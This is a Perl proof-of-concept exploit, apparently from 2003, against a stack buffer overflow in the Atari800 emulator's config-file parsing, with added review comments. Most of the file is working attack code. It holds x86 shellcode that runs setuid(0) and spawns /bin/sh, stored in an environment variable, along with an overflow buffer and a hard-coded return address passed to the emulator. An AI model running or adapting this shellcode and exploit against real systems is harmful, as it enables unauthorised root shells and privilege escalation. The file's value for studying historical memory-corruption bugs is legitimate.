#!perl
########################################################
# PoC By OpTiKoOl, for Atari 800 Emulator, Version 1.3.0
# based on
# http://www.securityfocus.com/archive/1/331518/2003-08-01/2003-08-07/0
# -
# This PoC exploits a bof in parsing a very long config file ( > 250 bytes )
# As in the advisory there's other bofs. but i just researched this one to
# make a Proof-Of-Concept Code.
# In Gentoo Linux (distro where this poc was developed) there isn't any suid
# atari800 binaries. i suppose.. :D
# -
# Tested against Atari800 from portage.
# OpTiKoOl@syners.org & OpTiKoOl@psyfreakz.org
# -
# Big kiss to Neuza ;* ehehe The Buf Smashing The Stack! lol
# and a fucking shout to psychedelic ppl, you rockZ!
# Stay Fresh!
#
# NOTE(review): the script runs without `use strict; use warnings;`, so
# $shellcode and $buf below are package globals rather than lexicals.
# NOTE(review): the whole approach depends on a fixed stack layout (a
# hard-coded 4-byte value and a payload placed in the environment); on a
# build with stack-protector, non-executable stack or ASLR that layout
# does not hold, so the PoC is only meaningful against the 2003-era build
# named in the header - confirm against the target before drawing conclusions.

# Print the banner. The single string literal is emitted verbatim.
# Called below as `&head;` - that form passes the caller's current @_,
# which is harmless here because the sub never reads @_.
sub head {
    print "##################################################### # PoC against Atari 800 Emulator, Version 1.3.0 # by OpTiKoOl\@syners.org and OpTiKoOl\@psyfreakz.org # 02/08/2003, CopyLeft by OpTiKoOl ... # http://www.syners.org/ & http://psyfreakz.org/ # - # Big Kiss 2 Neuza ;* Chuak! Chuak! #\n";
}

# this sc was ripped from a fake (trojaned) exploit...
# but this is a real shellcode, so enjoy :D
# Raw machine-code bytes as a byte string; the trailing "/bin/sh" is data
# referenced by the code that precedes it. Only the first chunk is
# annotated by the author; the rest is not decoded here.
$shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" #setuid 0
    . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
    . "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    . "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

# 10-byte filler repeated 25 times = 250 bytes, matching the "> 250 bytes"
# threshold the header comment attributes to the config-file parser.
$buf = "SYNERSOWNZ" x 25;

# The payload travels in the child's environment, not in the argument;
# the name 'SYNERS' is arbitrary and is not referenced anywhere else here.
$ENV{'SYNERS'} = $shellcode;

# Four fixed bytes appended after the filler. The author gives no
# derivation; presumably tied to the tested build's stack layout - TODO confirm.
$buf .= "\xad\xff\xff\xbf";

&head;

# String-form exec: the command is handed to /bin/sh as one line, so the
# non-printable bytes in $buf pass through shell parsing before reaching
# atari800's argv. The path to the emulator is hard-coded.
exec("/usr/bin/atari800 -config $buf");